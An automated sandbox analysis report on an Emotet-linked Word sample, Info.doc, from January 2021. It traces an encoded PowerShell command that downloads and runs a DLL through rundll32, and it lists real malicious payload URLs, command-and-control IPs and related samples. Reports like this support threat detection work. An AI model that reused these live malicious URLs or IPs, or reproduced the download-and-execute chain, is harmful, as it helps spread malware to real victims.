                      Cloud AccountsCommand and Scripting Interpreter111Network Logon ScriptNetwork Logon ScriptMasquerading21LSA SecretsSecurity Software Discovery121SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaPowerShell4Rc.commonRc.commonVirtualization/Sandbox Evasion2Cached Domain CredentialsVirtualization/Sandbox Evasion2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection111DCSyncProcess Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobHidden Files and Directories1Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Rundll321/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Behavior Graph ID: 336957 | Sample: Info.doc | Startdate: 07/01/2021 | Architecture: WINDOWS | Score: 100

                      Node and edge labels recovered from the rendered graph:

                      • Sample-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Multi AV Scanner detection for domain / URL; Antivirus detection for URL or domain; 13 other signatures
                      • cmd.exe started, flagged with: Suspicious powershell command line found; Very long command line found; Encrypted powershell cmdline option found; PowerShell case anomaly found. It started powershell.exe and msg.exe.
                      • WINWORD.EXE started and dropped C:\Users\user\Desktop\~$Info.doc (data)
                      • powershell.exe contacted dagranitegiare.com (45.119.81.203, 443, 49165; LVSS-AS-VNLongVanSystemSolutionJSCVN, Viet Nam), dropped C:\Users\user\Rg0646r\Q90xmrq\M8jklv4.dll (PE32), was flagged "Powershell drops PE file", and started rundll32.exe
                      • That rundll32.exe started a chain of seven further rundll32.exe processes, each flagged "Hides that the sample has been downloaded from the Internet (zone.identifier)"


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      Source | Detection | Scanner | Label
                      Info.doc | 70% | Virustotal | -
                      Info.doc | 56% | ReversingLabs | Document-Word.Trojan.Valyria

                      Dropped Files

                      Source | Detection | Scanner | Label
                      C:\Users\user\Rg0646r\Q90xmrq\M8jklv4.dll | 100% | Joe Sandbox ML | -
                      C:\Users\user\Rg0646r\Q90xmrq\M8jklv4.dll | 93% | ReversingLabs | Win32.Trojan.Emotet

                      Unpacked PE Files

                      Source | Detection | Scanner | Label
                      12.2.rundll32.exe.1b0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      14.2.rundll32.exe.2c0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      19.2.rundll32.exe.1d0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      13.2.rundll32.exe.270000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      21.2.rundll32.exe.200000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      12.2.rundll32.exe.190000.0.unpack | 100% | Avira | HEUR/AGEN.1110387
                      10.2.rundll32.exe.3a0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      23.2.rundll32.exe.230000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      17.2.rundll32.exe.230000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      9.2.rundll32.exe.1d0000.0.unpack | 100% | Avira | HEUR/AGEN.1110387
                      11.2.rundll32.exe.210000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      20.2.rundll32.exe.240000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      8.2.rundll32.exe.690000.0.unpack | 100% | Avira | HEUR/AGEN.1110387
                      18.2.rundll32.exe.220000.0.unpack | 100% | Avira | HEUR/AGEN.1110387
                      15.2.rundll32.exe.1a0000.0.unpack | 100% | Avira | HEUR/AGEN.1110387
                      16.2.rundll32.exe.6b0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      9.2.rundll32.exe.1f0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      7.2.rundll32.exe.2c0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      15.2.rundll32.exe.1c0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      22.2.rundll32.exe.220000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      8.2.rundll32.exe.6b0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      10.2.rundll32.exe.380000.0.unpack | 100% | Avira | HEUR/AGEN.1110387
                      11.2.rundll32.exe.1f0000.0.unpack | 100% | Avira | HEUR/AGEN.1110387
                      18.2.rundll32.exe.2a0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

                      Domains

                      Source | Detection | Scanner | Label
                      dagranitegiare.com | 8% | Virustotal | -

                      URLs

                      Source | Detection | Scanner | Label
                      https://167.71.148.58:443/6nxx5oih3i78uw7qh7/m4898/4op628cd88c/ji50i68zs1/i9hmqo/ | 0% | Avira URL Cloud | safe
                      https://dagranitegiare.com/wp-admin/jCH/ | 17% | Virustotal | -
                      https://dagranitegiare.com/wp-admin/jCH/ | 100% | Avira URL Cloud | malware
                      http://cps.letsencrypt.org0 | 0% | URL Reputation | safe
                      http://ocsp.entrust.net03 | 0% | URL Reputation | safe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe
                      http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe
                      https://dagranitegiare.com/wp-admin/jCH/P | 100% | Avira URL Cloud | malware
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
                      http://zhongshixingchuang.com/wp-admin/OTm/ | 15% | Virustotal | -
                      http://zhongshixingchuang.com/wp-admin/OTm/ | 100% | Avira URL Cloud | malware
                      http://r3.i.lencr.org/0 | 0% | Avira URL Cloud | safe
                      http://koreankidsedu.com/wp-content/2cQTh/ | 100% | Avira URL Cloud | malware
                      http://www.greaudstudio.com/docs/FGn/ | 100% | Avira URL Cloud | malware
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | URL Reputation | safe
                      http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
                      https://dagranitegiare.com | 100% | Avira URL Cloud | phishing
                      http://geoffoglemusic.com/wp-admin/x/ | 100% | Avira URL Cloud | malware
                      http://r3.o.lencr.org0 | 0% | URL Reputation | safe
                      http://www.%s.comPA | 0% | URL Reputation | safe
                      http://ocsp.entrust.net0D | 0% | URL Reputation | safe
                      https://suriagrofresh.com/serevers/MVDjI/ | 100% | Avira URL Cloud | malware
                      http://servername/isapibackend.dll0%Avira URL Cloudsafe
                      http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
                      http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
                      http://cps.root-x1.letsencrypt.org00%URL Reputationsafe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
dagranitegiare.com | 45.119.81.203 | true | true | - | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
https://167.71.148.58:443/6nxx5oih3i78uw7qh7/m4898/4op628cd88c/ji50i68zs1/i9hmqo/ | true | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.windows.com/pctv. | rundll32.exe, 00000008.00000002.2099147774.0000000001E80000.00000002.00000001.sdmp | false | - | high
http://investor.msn.com | powershell.exe, 00000005.00000002.2105210846.000000001CCC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2100613650.0000000001B60000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097379165.0000000002060000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2099147774.0000000001E80000.00000002.00000001.sdmp | false | - | high
http://www.msnbc.com/news/ticker.txt | powershell.exe, 00000005.00000002.2105210846.000000001CCC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2100613650.0000000001B60000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097379165.0000000002060000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2099147774.0000000001E80000.00000002.00000001.sdmp | false | - | high
http://crl.entrust.net/server1.crl0 | powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmp | false | - | high
https://dagranitegiare.com/wp-admin/jCH/ | powershell.exe, 00000005.00000002.2100437393.0000000003B3C000.00000004.00000001.sdmp | true | 17%, Virustotal, Browse; Avira URL Cloud: malware | unknown
http://cps.letsencrypt.org0 | powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmp | false | URL Reputation: safe (x4) | unknown
http://ocsp.entrust.net03 | powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmp | false | URL Reputation: safe (x4) | unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmp | false | URL Reputation: safe (x4) | unknown
http://www.diginotar.nl/cps/pkioverheid0 | powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmp | false | URL Reputation: safe (x4) | unknown
https://dagranitegiare.com/wp-admin/jCH/P | powershell.exe, 00000005.00000002.2097330160.0000000002F92000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | powershell.exe, 00000005.00000002.2106134219.000000001CEA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2101263831.0000000001D47000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097603957.0000000002247000.00000002.00000001.sdmp, rundll32.exe, 0000000F.00000002.2111902319.0000000002207000.00000002.00000001.sdmp | false | URL Reputation: safe (x4) | unknown
http://www.hotmail.com/oe | powershell.exe, 00000005.00000002.2105210846.000000001CCC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2100613650.0000000001B60000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097379165.0000000002060000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2099147774.0000000001E80000.00000002.00000001.sdmp | false | - | high
http://zhongshixingchuang.com/wp-admin/OTm/ | powershell.exe, 00000005.00000002.2097330160.0000000002F92000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2100437393.0000000003B3C000.00000004.00000001.sdmp | true | 15%, Virustotal, Browse; Avira URL Cloud: malware | unknown
http://r3.i.lencr.org/0 | powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://koreankidsedu.com/wp-content/2cQTh/ | powershell.exe, 00000005.00000002.2097330160.0000000002F92000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2100437393.0000000003B3C000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | powershell.exe, 00000005.00000002.2106134219.000000001CEA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2101263831.0000000001D47000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097603957.0000000002247000.00000002.00000001.sdmp, rundll32.exe, 0000000F.00000002.2111902319.0000000002207000.00000002.00000001.sdmp | false | - | high
http://www.greaudstudio.com/docs/FGn/ | powershell.exe, 00000005.00000002.2097330160.0000000002F92000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2100437393.0000000003B3C000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.icra.org/vocabulary/. | powershell.exe, 00000005.00000002.2106134219.000000001CEA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2101263831.0000000001D47000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097603957.0000000002247000.00000002.00000001.sdmp, rundll32.exe, 0000000F.00000002.2111902319.0000000002207000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | powershell.exe, 00000005.00000002.2096214706.0000000002460000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2098993097.0000000002930000.00000002.00000001.sdmp | false | - | high
https://dagranitegiare.com | powershell.exe, 00000005.00000002.2097330160.0000000002F92000.00000004.00000001.sdmp | true | Avira URL Cloud: phishing | unknown
http://investor.msn.com/ | powershell.exe, 00000005.00000002.2105210846.000000001CCC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2100613650.0000000001B60000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097379165.0000000002060000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2099147774.0000000001E80000.00000002.00000001.sdmp | false | - | high
http://geoffoglemusic.com/wp-admin/x/ | powershell.exe, 00000005.00000002.2097330160.0000000002F92000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2100437393.0000000003B3C000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://r3.o.lencr.org0 | powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.%s.comPA | powershell.exe, 00000005.00000002.2096214706.0000000002460000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2098993097.0000000002930000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2101133353.0000000002800000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | low
http://ocsp.entrust.net0D | powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
https://secure.comodo.com/CPS0 | powershell.exe, 00000005.00000002.2104542311.000000001B568000.00000004.00000001.sdmp | false | - | high
https://suriagrofresh.com/serevers/MVDjI/ | powershell.exe, 00000005.00000002.2097330160.0000000002F92000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2100437393.0000000003B3C000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://servername/isapibackend.dll | powershell.exe, 00000005.00000002.2106930484.000000001D360000.00000002.00000001.sdmp | false | Avira URL Cloud: safe | low
http://crl.entrust.net/2048ca.crl0 | powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmp | false | - | high
http://cps.root-x1.letsencrypt.org0 | powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmp | false | URL Reputation: safe (x3) | unknown

                                          Contacted IPs


Public

IP | Domain | Country | ASN | ASN Name | Malicious
167.71.148.58 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | true
202.187.222.40 | unknown | Malaysia | 9930 | TTNET-MYTIMEdotComBerhadMY | true
45.119.81.203 | unknown | Viet Nam | 131386 | LVSS-AS-VNLongVanSystemSolutionJSCVN | true
184.66.18.83 | unknown | Canada | 6327 | SHAWCA | true

General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 336957
Start date: 07.01.2021
Start time: 13:42:25
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 13m 33s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Info.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 25
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• GSI enabled (VBA)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winDOC@42/15@1/4
EGA Information:
• Successful, ratio: 50%
HDC Information:
• Successful, ratio: 81.1% (good quality ratio 74.5%)
• Quality average: 72.1%
• Quality standard deviation: 29.8%
HCA Information:
• Successful, ratio: 93%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .doc
• Found Word or Excel or PowerPoint or XPS Viewer
• Found warning dialog
• Click Ok
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 192.35.177.64, 93.184.221.240
• Excluded domains from analysis (whitelisted): wu.ec.azureedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, apps.digsigtrust.com, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu.wpc.apr-52dd2.edgecastdns.net, apps.identrust.com, au-bg-shim.trafficmanager.net, wu.azureedge.net
• Execution Graph export aborted for target powershell.exe, PID 2312 because it is empty
• Execution Graph export aborted for target rundll32.exe, PID 2240 because there are no executed functions
• Execution Graph export aborted for target rundll32.exe, PID 2448 because there are no executed functions
• Execution Graph export aborted for target rundll32.exe, PID 2480 because there are no executed functions
• Execution Graph export aborted for target rundll32.exe, PID 260 because there are no executed functions
• Execution Graph export aborted for target rundll32.exe, PID 2804 because there are no executed functions
• Execution Graph export aborted for target rundll32.exe, PID 912 because there are no executed functions
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time | Type | Description
13:42:37 | API Interceptor | 1x Sleep call for process: msg.exe modified
13:42:38 | API Interceptor | 62x Sleep call for process: powershell.exe modified
13:42:45 | API Interceptor | 568x Sleep call for process: rundll32.exe modified

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
167.71.148.58 | 09922748 2020 909_3553.doc | Get hash | malicious | Browse | 167.71.148.58:443/hmj5vtnwvmoed5al/v2rzu19kezl4ociy/lwcymauesm35l/scrqoykcge7ozr/lwmckdg2s4/
167.71.148.58 | info-29-122020.doc | Get hash | malicious | Browse | 167.71.148.58:443/qk90ciyt532x3l/3frjvkqc2dudu/bwrw/
167.71.148.58 | 79685175.doc | Get hash | malicious | Browse | 167.71.148.58:443/ddfeddgtlve8/qea5xg5lugywunnrb/3fep6lwfy/5iyhveusfl/walzhzdp/
167.71.148.58 | INV750178 281220.doc | Get hash | malicious | Browse | 167.71.148.58:443/n8j7z917hs/
167.71.148.58 | ARCHIVOFile-2020-IM-65448896.doc | Get hash | malicious | Browse | 167.71.148.58:443/dz0y/
167.71.148.58 | MENSAJE_29_2020.doc | Get hash | malicious | Browse | 167.71.148.58:443/9kb8jd09jfjjzu6p/710krlahr1w7x1ai4dw/vrx55jw5pft/29cpm1xmdw/44c4i7/
167.71.148.58 | MENSAJE_29_2020.doc | Get hash | malicious | Browse | 167.71.148.58:443/9d9qfmnts3/vjvjz2rwjwd3/kruxv/r53q9e331/vmffjrhd6r8m0no7f0/
167.71.148.58 | MENSAJE.doc | Get hash | malicious | Browse | 167.71.148.58:443/r8a9ihd5x7y9gubs/0w29tdx9/w9aqw0fel8ghiol/
167.71.148.58 | ARCH.doc | Get hash | malicious | Browse | 167.71.148.58:443/yndmmlzko00/thlmglu2/litlfgg7al5t/7c2tfqo837z45f/
167.71.148.58 | naamloos-40727_8209243962.doc | Get hash | malicious | Browse | 167.71.148.58:443/qov6j8tqrxo/qmy5tpwx15euwz50u/etk5u/er4m7h0jkgtu0lqulo/0npx0hy2i/yjsj5l2i/
167.71.148.58 | arc-20201229-07546.doc | Get hash | malicious | Browse | 167.71.148.58:443/rmc2rtnzt4/fga45dyk3awr/2sr766n207t/
167.71.148.58 | FIL_49106127 528164.doc | Get hash | malicious | Browse | 167.71.148.58:443/10uvse7/v0kinw131/ed37ws4ddndv1iwbh9/a3yymy4k79ii39ps/
167.71.148.58 | Adjunto_2020_UH-13478.doc | Get hash | malicious | Browse | 167.71.148.58:443/495u60b7ajrab1a3v/6l2h13gy/wjaosw38b/dftbhdpoilzw3/em8pnsrzerk714/6919nubsvqxw2911/
167.71.148.58 | Dati.doc | Get hash | malicious | Browse | 167.71.148.58:443/i6p9p6/
167.71.148.58 | 4693747_2020_7865319.doc | Get hash | malicious | Browse | 167.71.148.58:443/dd8xgec1513nstpclm7/1tb9c9bqpxml9mrid55/
167.71.148.58 | ARCH.doc | Get hash | malicious | Browse | 167.71.148.58:443/1mpy4lrtxykgw5i/yn5yixx/
167.71.148.58 | LIST_20201229_1397.doc | Get hash | malicious | Browse | 167.71.148.58:443/11c0whd0/
167.71.148.58 | documento 2912 2020.doc | Get hash | malicious | Browse | 167.71.148.58:443/ra3q90a4b9qy3435u4/3ka3yw5o/4ihgodinbet/ffq83awdif0a69irje1/m9uclpm90mj/
167.71.148.58 | INFO 2020 DWP_947297.doc | Get hash | malicious | Browse | 167.71.148.58:443/wps70yc/suknxvfkubdwr/8m58qopltial6j/zs8odemvec0x72h/
167.71.148.58 | 166759_2112_2020_U_8180037.doc | Get hash | malicious | Browse | 167.71.148.58:443/cc6a5z5xetc/dbesg63lm3bz6f/ja38o6b5sun54/muj9lb37hjlph/za8htyniz99hyc8cz/8n11um4/
202.187.222.40 | index.html.dll | Get hash | malicious | Browse | 202.187.222.40/6knpolw2ea15x/wl5r20ctm3/
202.187.222.40 | Documento_2020.doc | Get hash | malicious | Browse | 202.187.222.40/mwhowwqb/gks2aqnysulsbbf/v6acyr4iy3c91t/ull4jzd9gg/ejl9fk51o96izzc/
202.187.222.40 | List 2020_12_21 OZV3903.doc | Get hash | malicious | Browse | 202.187.222.40/3mm3s1d7s7s4pj3/iktbo/gynznozxnj1dq7/5wici4/usvuanvlngtkv/t3gjqtewd3fpq/
202.187.222.40 | MF11374 2020.doc | Get hash | malicious | Browse | 202.187.222.40/qp1n21x/dm6rx/
202.187.222.40 | SecuriteInfo.com.W97M.DownLoader.5028.13042.doc | Get hash | malicious | Browse | 202.187.222.40/4q2vp2zhr/tw6gc8b11d4dlpw4o/
202.187.222.40 | INFO-22.doc | Get hash | malicious | Browse | 202.187.222.40/1e56hy0va62yk/mt5n1liyo5hg/6efu94gy/rxzydao0a3bbzw/
202.187.222.40 | Documento_9276701.doc | Get hash | malicious | Browse | 202.187.222.40/3u7zpjzcji/pdgc5fp1c/9tg5/
202.187.222.40 | Dati_2112_122020.doc | Get hash | malicious | Browse | 202.187.222.40/7iga49cgomahelodxo/
202.187.222.40 | Informacion 122020 N-98239.doc | Get hash | malicious | Browse | 202.187.222.40/xqmtay/
202.187.222.40 | as233456.doc | Get hash | malicious | Browse | 202.187.222.40/n91cd/66sk22clombtb17lxc/dr4e/f27un216im1/gx8f2z/gmzqc3/
202.187.222.40 | Y0124.doc | Get hash | malicious | Browse | 202.187.222.40/uoj70yal/

Domains

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
dagranitegiare.com | List 2020_12_21 OZV3903.doc | Get hash | malicious | Browse | 45.119.81.203

ASN

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
LVSS-AS-VNLongVanSystemSolutionJSCVN | List 2020_12_21 OZV3903.doc | Get hash | malicious | Browse | 45.119.81.203
LVSS-AS-VNLongVanSystemSolutionJSCVN | Refusal-1881267613-10062020.xls | Get hash | malicious | Browse | 45.119.83.237
LVSS-AS-VNLongVanSystemSolutionJSCVN | Refusal-1881267613-10062020.xls | Get hash | malicious | Browse | 45.119.83.237
LVSS-AS-VNLongVanSystemSolutionJSCVN | Refusal-1881267613-10062020.xls | Get hash | malicious | Browse | 45.119.83.237
LVSS-AS-VNLongVanSystemSolutionJSCVN | Crack_BitRecover_PST_Password_R.exe | Get hash | malicious | Browse | 103.27.238.31
LVSS-AS-VNLongVanSystemSolutionJSCVN | DOC-98524533970.pdf | Get hash | malicious | Browse | 45.119.83.245
LVSS-AS-VNLongVanSystemSolutionJSCVN | ltmdjf.exe | Get hash | malicious | Browse | 103.27.238.31
LVSS-AS-VNLongVanSystemSolutionJSCVN | klkdajezvwyhou.exe | Get hash | malicious | Browse | 103.27.238.31
LVSS-AS-VNLongVanSystemSolutionJSCVN | redafrjfoxy.exe | Get hash | malicious | Browse | 103.27.238.31
LVSS-AS-VNLongVanSystemSolutionJSCVN | vnubu.exe | Get hash | malicious | Browse | 103.27.238.31
LVSS-AS-VNLongVanSystemSolutionJSCVN | 47Bewerbungsunterlagen - Nina Peter - 17.09.exe | Get hash | malicious | Browse | 103.27.238.31
LVSS-AS-VNLongVanSystemSolutionJSCVN | 10Janine Mosel - Bewerbungsunterlagen - 14.09.2018.exe | Get hash | malicious | Browse | 103.27.238.31
LVSS-AS-VNLongVanSystemSolutionJSCVN | Janine Mosel - Bewerbungsunterlagen - 14.09.2018.exe | Get hash | malicious | Browse | 103.27.238.31
LVSS-AS-VNLongVanSystemSolutionJSCVN | 8Julia Sammer - Bewerbung und Lebenslauf - 13.09.2018.exe | Get hash | malicious | Browse | 103.27.238.31
LVSS-AS-VNLongVanSystemSolutionJSCVN | Nadine Walz - Bewerbungsunterlagen - 12.09.exe | Get hash | malicious | Browse | 103.27.238.31
LVSS-AS-VNLongVanSystemSolutionJSCVN | 52Sofia Hubert - Bewerbung und Lebenslauf - 07.09.2018.exe | Get hash | malicious | Browse | 103.27.238.31
LVSS-AS-VNLongVanSystemSolutionJSCVN | 20Bewerbung und Lebenslauf - Sofia Walter - 04.09.2018.exe | Get hash | malicious | Browse | 103.27.238.31
LVSS-AS-VNLongVanSystemSolutionJSCVN | info.exe | Get hash | malicious | Browse | 103.27.238.31
LVSS-AS-VNLongVanSystemSolutionJSCVN | srlaph.exe | Get hash | malicious | Browse | 103.27.238.31
LVSS-AS-VNLongVanSystemSolutionJSCVN | ikwrux.exe | Get hash | malicious | Browse | 103.27.238.31
DIGITALOCEAN-ASNUS | Informacion_29.doc | Get hash | malicious | Browse | 138.197.99.250
DIGITALOCEAN-ASNUS | https://pdfsharedmessage.xtensio.com/7wtcdlta | Get hash | malicious | Browse | 134.209.238.18
DIGITALOCEAN-ASNUS | readme.doc | Get hash | malicious | Browse | 159.89.126.148
DIGITALOCEAN-ASNUS | http://cvpro.info/wp-admin/fzNN04Xs2LGKNw6vR3M/ | Get hash | malicious | Browse | 206.189.52.133
DIGITALOCEAN-ASNUS | http://fake-cash-app-screenshot-generator.hostforjusteasy.fun | Get hash | malicious | Browse | 167.71.72.151
DIGITALOCEAN-ASNUS | http://search.hwatchtvnow.co | Get hash | malicious | Browse | 37.139.1.159
DIGITALOCEAN-ASNUS | DAT 2020_12_30.doc | Get hash | malicious | Browse | 138.197.202.203
DIGITALOCEAN-ASNUS | http://yfnyblv.yobinsetio.site/ | Get hash | malicious | Browse | 165.22.207.20
DIGITALOCEAN-ASNUS | http://mainfreight-6452496282.eritro.ir/retailer.php?ikpah=Z2lvdmFuYS50YWJhcmluaUBtYWluZnJlaWdodC5jb20= | Get hash | malicious | Browse | 188.166.103.55
DIGITALOCEAN-ASNUS | #Ud83d#Udcde mkoxlien@hbs.net @ 503 AM 503 AM.pff.HTM | Get hash | malicious | Browse | 159.89.4.250
DIGITALOCEAN-ASNUS | https://doc.clickup.com/p/h/2hm67-99/806f7673f7694a9 | Get hash | malicious | Browse | 167.172.136.187
DIGITALOCEAN-ASNUS | #Ud83d#Udcde roberto.hernandez@hoerbiger.com @[DateTime][Name].pff.HTM | Get hash | malicious | Browse | 159.89.4.250
DIGITALOCEAN-ASNUS | http://delivery.unlocklocks.com/HSOMEU?id=124732=Jx8EBwNQDgsBTwECUwcIUlUBUx0=QgtZWk8ADFsJdkUDDQ9cU1AITVAdXENVHwYOUlwHUlMHUgMPUFtXAVMPTwoQF0QMHktdXV9aR1cRThYXC10MAl4OWlUKEE1XDVscKjcseXNkW1BcT0UD&fl=DBdARkJeFhdeXFVXEVleAwhYDxhRB1tCAA8AVRBTHQELDhtTYg1eVkAc | Get hash | malicious | Browse |
                                          • 139.59.54.187
                                          ARCHIVOFile.docGet hashmaliciousBrowse
                                          • 138.197.99.250
                                          Doc 2912 75513.docGet hashmaliciousBrowse
                                          • 138.197.99.250
                                          rib.exeGet hashmaliciousBrowse
                                          • 159.65.44.102
                                          79685175.docGet hashmaliciousBrowse
                                          • 138.197.99.250
                                          DATI 2020.docGet hashmaliciousBrowse
                                          • 138.197.99.250
                                          7mB0FoVcSn.exeGet hashmaliciousBrowse
                                          • 139.59.19.157
                                          TN22020000560175.exeGet hashmaliciousBrowse
                                          • 138.197.103.178
                                          TTNET-MYTIMEdotComBerhadMY4693747_2020_7865319.docGet hashmaliciousBrowse
                                          • 202.187.222.40
                                          index.html.dllGet hashmaliciousBrowse
                                          • 202.187.222.40
                                          Documento_2020.docGet hashmaliciousBrowse
                                          • 202.187.222.40
                                          List 2020_12_21 OZV3903.docGet hashmaliciousBrowse
                                          • 202.187.222.40
                                          MF11374 2020.docGet hashmaliciousBrowse
                                          • 202.187.222.40
                                          SecuriteInfo.com.W97M.DownLoader.5028.13042.docGet hashmaliciousBrowse
                                          • 202.187.222.40
